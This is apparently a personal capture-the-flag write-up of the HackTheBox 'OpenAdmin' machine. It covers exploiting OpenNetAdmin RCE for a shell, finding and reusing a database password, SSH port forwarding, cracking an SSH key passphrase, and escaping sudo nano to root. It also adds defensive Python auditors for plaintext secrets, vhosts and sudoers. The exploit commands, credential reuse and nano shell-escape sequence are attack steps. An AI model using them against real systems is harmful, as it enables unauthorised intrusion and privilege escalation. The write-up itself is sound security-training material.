## Enumeration
### 80 HTTP / Webserver
Directory enum reveals:
- `/music`
- `/artwork`
- `/sierra`
- Navigating to http://10.10.10.171/music/ reveals a new webpage.
  - Pressing the login button redirects to: http://10.10.10.171/ona/
  - Appears to be an "OpenNetAdmin" page.
    - Authenticated as guest
    - Searchsploit reveals a couple of web RCE exploits for it
    - Front page reveals service version `v18.1.1`
    - Exploit is available
## Initial Access
- Clone exploit code from [github](https://github.com/amriunix/ona-rce)
- Verify the vuln: `python3 ona-rce.py check http://10.10.10.171/ona/`
- Execute: `python3 ona-rce.py exploit http://10.10.10.171/ona/`
- Reverse shell granted <3
## Privesc - `www-data`
- Unusual files in `/opt`
  - Folder contains the OpenNetAdmin code
  - Credentials?
    - Attempted to connect via mysql as the `www-data` user (current)
- users
  - `joanna`
- home
  - `/home/joanna` - denied
  - `/home/jimmy` - denied
- internal services
```
www-data@openadmin:/home$ netstat -tuln
netstat -tuln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:52846 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp6 0 0 :::80 :::* LISTEN
tcp6 0 0 :::22 :::* LISTEN
udp 0 0 127.0.0.53:53 0.0.0.0:*
```
- credential hunting
  - `grep -ri "password" /opt/ona`
```
www-data@openadmin:/opt/ona/www/config$ grep -ri "pass" ./
grep -ri "pass" ./
./auth_ldap.config.php://$conf['auth']['ldap']['bindpw'] = 'mysecretbindpassword';
./config.inc.php:// Think of it as a cache or an easy way to pass data around ;)
```
So we got something resembling a password here: `mysecretbindpassword`.
Spraying that password against the users listed above yields no result...
Possibly a dummy password?
- Confirmed by inspecting the source code: https://github.com/opennetadmin/ona/blob/master/www/config/auth_ldap.config.php
Further inspection of the source reveals default credentials: `admin:admin`.
Authenticating as `admin:admin` in the web UI lets us inspect partial database connection info.
### Database Password
What about the database password?
Some google-fu yields the following [forum thread](https://opennetadmin.com/forum_archive/4/t-85.html), which conveniently contains the full path of the database credentials file <3:
```
www-data@openadmin:/opt/ona/www/local/config$ cat database_settings.inc.php
cat database_settings.inc.php
<?php
$ona_contexts=array (
'DEFAULT' =>
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);
```
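The `grep -ri pass` run earlier hit a comment and a commented-out LDAP setting (note the leading `//` on the `bindpw` line) before the live `db_passwd` turned up in `database_settings.inc.php`. As an added example (not part of this writeup or of OpenNetAdmin), here is a small Python scanner that reports only string assignments to password-like keys and marks commented-out ones, run over constructed copies of the three files quoted above:

```python
import re

# Constructed samples modelled on the three files quoted in the writeup: a
# commented-out LDAP bind password, a comment that merely contains "pass",
# and the live database password inside the nested $ona_contexts array.
SAMPLE_FILES = {
    "auth_ldap.config.php":
        "<?php\n//$conf['auth']['ldap']['bindpw'] = 'mysecretbindpassword';\n",
    "config.inc.php":
        "<?php\n// Think of it as a cache or an easy way to pass data around ;)\n"
        "$conf['debug'] = 'off';\n",
    "database_settings.inc.php":
        "<?php\n$ona_contexts=array (\n 'DEFAULT' =>\n  array (\n   'databases' =>\n"
        "    array (\n     0 =>\n      array (\n       'db_type' => 'mysqli',\n"
        "       'db_login' => 'ona_sys',\n       'db_passwd' => 'n1nj4W4rri0R!',\n"
        "      ),\n    ),\n  ),\n);\n",
}

# Key names that denote a credential when assigned a non-empty string literal.
SECRET_KEY = re.compile(r"pass(?:wd|word)?|pwd|secret|bindpw|token", re.I)

# The two PHP literal-assignment shapes seen in these files:
#   $conf['auth']['ldap']['bindpw'] = '...';     and     'db_passwd' => '...',
ASSIGN = re.compile(
    r"""(?P<key>[A-Za-z0-9_$\[\]'"]+)\s*(?:=>|=)\s*(?P<q>['"])(?P<val>.*?)(?P=q)""")

def find_plaintext_secrets(filename, text):
    """Return one finding per string assignment to a secret-looking key."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        # A leading comment marker means dead config (the bindpw case), not a live secret.
        commented = line.lstrip().startswith(("//", "#", "/*", "*"))
        for m in ASSIGN.finditer(line):
            key = (re.findall(r"[A-Za-z0-9_]+", m.group("key")) or [""])[-1]  # innermost name
            if SECRET_KEY.search(key) and m.group("val"):
                findings.append({"file": filename, "line": lineno, "key": key,
                                 "value": m.group("val"), "commented": commented})
    return findings

def scan_files(files):
    """Scan a {filename: contents} mapping; live (uncommented) hits sort first."""
    found = [f for name, text in files.items() for f in find_plaintext_secrets(name, text)]
    return sorted(found, key=lambda f: (f["commented"], f["file"], f["line"]))

if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        state = "commented-out" if f["commented"] else "LIVE"
        print(f"{state:13} {f['file']}:{f['line']}  {f['key']} = {f['value']!r}")
```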
```
# --password needs '=' (a bare --password prompts interactively instead);
# single quotes stop bash from history-expanding the '!'
mysql -u ona_sys -h localhost --database ona_default --password='n1nj4W4rri0R!'
```
Aaaand we're in...
Enumeration of the database reveals a `users` table containing the following password hashes:
```
guest:098f6bcd4621d373cade4e832627b4f6
admin:21232f297a57a5a743894a0e4a801fc3
```
Let's attempt to crack 'em:
```
guest:test
admin:admin
```
Soooo... not likely to be helpful, as these are just the default web app passwords....
I'll just respray the database password `n1nj4W4rri0R!` against the system users and get a hit for:
```
jimmy:n1nj4W4rri0R!
```
### Escalating to `jimmy`
- not in sudoers file
- nothing interesting in `/home/jimmy`
- `$ env` - nada
- no interesting procs
- the fact that we can't run sudo also excludes [[SUID Binaries]]
- no interesting groups
- running `who`, `w` and `last` reveals that `joanna` has recently been logged in
- no crontab
- possibly a rabbit hole, this dude?
- throwing `pspy` at it.... - nada
- Got stuck and took a hint: `virtualhosts`
### Apache `vhosts`
```
cat /etc/apache2/sites-enabled/*.conf
```
```
jimmy@openadmin:/opt$ cat /etc/apache2/sites-enabled/*.conf
Listen 127.0.0.1:52846
<VirtualHost 127.0.0.1:52846>
ServerName internal.openadmin.htb
DocumentRoot /var/www/internal
<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
ServerName openadmin.htb
ServerAdmin [email protected]
DocumentRoot /var/www/html
# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.
#LogLevel info ssl:warn
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
#Include conf-available/serve-cgi-bin.conf
</VirtualHost>
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
```
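The thing that matters in that config is the first block: a vhost bound to loopback only (so no external scan sees it) and, via `mpm_itk`, running as `joanna` rather than `www-data`, so any bug in that app reads her files. As an added example (not from the writeup or from Apache), a Python audit that parses `<VirtualHost>` blocks and flags exactly those two properties, run over a constructed, shortened copy of the config above; the set of acceptable worker accounts is an assumption:

```python
import re

# Constructed, shortened copy of the sites-enabled config quoted above.
SAMPLE_CONF = """\
<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal
    <IfModule mpm_itk_module>
        AssignUserID joanna joanna
    </IfModule>
</VirtualHost>
<VirtualHost *:80>
    # comment lines are ignored
    ServerName openadmin.htb
    DocumentRoot /var/www/html
</VirtualHost>
"""

SERVICE_ACCOUNTS = {"www-data", "apache", "httpd", "nobody"}   # assumed legitimate worker users
LOOPBACK = ("127.", "[::1]", "localhost")
FIELDS = {"servername": "server_name", "documentroot": "docroot",
          "assignuserid": "run_as"}   # AssignUserID is mpm-itk's "run this vhost as user"

def parse_vhosts(conf):
    """Return one dict per <VirtualHost> block: bind address plus the FIELDS directives."""
    vhosts, cur = [], None
    for raw in conf.splitlines():
        line = raw.strip()
        opened = re.match(r"<VirtualHost\s+([^>]+)>", line, re.I)
        if opened:
            cur = {"bind": opened.group(1).strip(), "server_name": None,
                   "docroot": None, "run_as": None}
        elif line.lower() == "</virtualhost>":
            vhosts.append(cur)
            cur = None
        elif cur is not None and line and line[0] not in "#<":   # skips <IfModule> wrappers
            parts = line.split()
            if parts[0].lower() in FIELDS and len(parts) > 1:
                cur[FIELDS[parts[0].lower()]] = parts[1]
    return vhosts

def audit_vhosts(conf):
    """Flag loopback-only binds and vhosts whose worker user is not a service account."""
    out = []
    for vh in parse_vhosts(conf):
        flags = []
        if vh["bind"].startswith(LOOPBACK):
            flags.append("loopback-only: missed by external scans, reachable from the host")
        if vh["run_as"] and vh["run_as"] not in SERVICE_ACCOUNTS:
            flags.append(f"runs as {vh['run_as']}: a web bug exposes that user's files")
        out.append({**vh, "flags": flags})
    return out
```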
Interesting stuff is located at `/var/www/internal`.
- source inspection reveals
  - `index.php`, which contains a password hash: `00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1`
    - likely a SHA-512 hash?
    - Cracks to `Revealed`
  - `main.php`, which upon execution reveals the contents of `/home/joanna/.ssh/id_rsa`
    - because why not?
So let's attempt to access that website....
From the box, a website does come back at:
```
curl http://127.0.0.1:52846
```
How do I go about doing a port forward?
```
# -L local_port:remote_host:remote_port binds local 52846 to the box's loopback-only 52846
sshpass -p 'n1nj4W4rri0R!' ssh -L 52846:127.0.0.1:52846 [email protected]
```
Navigating to http://localhost:52846 on my local browser now reveals a login prompt.
Using credentials `jimmy:Revealed` I get to access the `id_rsa` key for `joanna`.
It's encrypted though; had to take a hint here. Apparently I need to extract a hash from it, which can then be cracked using hashcat or similar.
The hash is extracted using `ssh2john id_rsa > id_rsa.hash` and then cracked:
```
╭─[λ]-[admin.konstantinovitz.com]-[/targets/openadmin]-[10.10.10.171]
╰─> john --wordlist=/arsenal/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [MD5/bcrypt-pbkdf/[3]DES/AES 32/64])
Cost 1 (KDF/cipher [0:MD5/AES 1:MD5/[3]DES 2:bcrypt-pbkdf/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
bloodninjas (id_rsa)
```
Soooo we get the passphrase: `bloodninjas` - very cool....
Let's decrypt the `id_rsa` key and SSH in as `joanna`.
### `joanna`
- checking sudo rights from the home dir:
```
User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv
Sudoers file: /etc/sudoers.d/joanna is readable
joanna ALL=(ALL) NOPASSWD:/bin/nano /opt/priv
```
So we can go ahead and run `sudo /bin/nano /opt/priv` without having to enter a sudo password <3.
Having a looksie at [gtfobins - nano](https://gtfobins.github.io/gtfobins/nano/) reveals a means of getting a root shell:
```
nano
^R^X
reset; sh 1>&0 2>&0
```
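The lesson in that rule is that restricting nano to `/opt/priv` buys nothing, because an editor that can spawn a shell carries its sudo privilege with it. As an added example (not from the writeup), a Python audit that parses sudoers user specs and flags NOPASSWD-or-not rules on shell-escape-capable programs; the sudoers lines are constructed and the program list is an illustrative subset, not a complete one:

```python
import re

# Constructed sudoers lines: the rule from the writeup plus two for contrast.
SAMPLE_SUDOERS = """\
# /etc/sudoers.d/joanna (constructed copy)
Defaults env_reset
joanna ALL=(ALL) NOPASSWD:/bin/nano /opt/priv
jimmy  ALL=(root) /usr/bin/systemctl restart apache2, /usr/bin/less /var/log/apache2/error.log
backup ALL=(ALL) NOPASSWD: /usr/bin/rsync -a /srv/ /mnt/backup/
"""

# Illustrative subset of editors/pagers/interpreters that can start a shell from
# inside sudo (the GTFOBins pattern used above); pinning the argument does not help.
SHELL_ESCAPE = {"nano", "vim", "vi", "less", "more", "man", "awk", "find", "python3", "perl"}

# user host=(runas) [TAG:]cmd args[, cmd args...]   (the Runas_Spec is optional)
SPEC = re.compile(r"^(?P<user>[^\s#]+)\s+(?P<hosts>[^\s=]+)\s*=\s*"
                  r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")

def parse_sudoers(text):
    """Yield (user, runas, tags, program, args) for every command in every user spec."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = SPEC.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            cmd, tags = cmd.strip(), []
            while (tag := re.match(r"([A-Z_]+):\s*", cmd)):   # NOPASSWD:, SETENV:, ...
                tags.append(tag.group(1))
                cmd = cmd[tag.end():]
            prog, _, args = cmd.partition(" ")
            yield m.group("user"), m.group("runas") or "root", tags, prog, args

def audit_sudoers(text):
    """Findings for rules that hand a shell-escape-capable program to a user."""
    findings = []
    for user, runas, tags, prog, args in parse_sudoers(text):
        base = prog.rsplit("/", 1)[-1]
        if base in SHELL_ESCAPE:
            findings.append({"user": user, "runas": runas, "program": prog,
                             "nopasswd": "NOPASSWD" in tags,
                             "note": f"{base} can spawn a shell as {runas}; "
                                     f"the argument '{args}' is not a restriction"})
    return findings
```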
### `root`
We get a root shell <3
```
cat /root/root.txt
80b6331d20bd9be7e1daec0a4cbc7923
```
## Lessons Learned
- Better understanding of `sudo`
- Spent too much time (and confusion) on the port forward
  - have socat binaries on hand
  - document the ssh port forward
- Didn't have john and related utils properly installed
- Had no real idea about the whole virtualhosts thingy
  - Was attempting to inspect the weird locally bound port
  - Gave up as my port forward skills sucked too much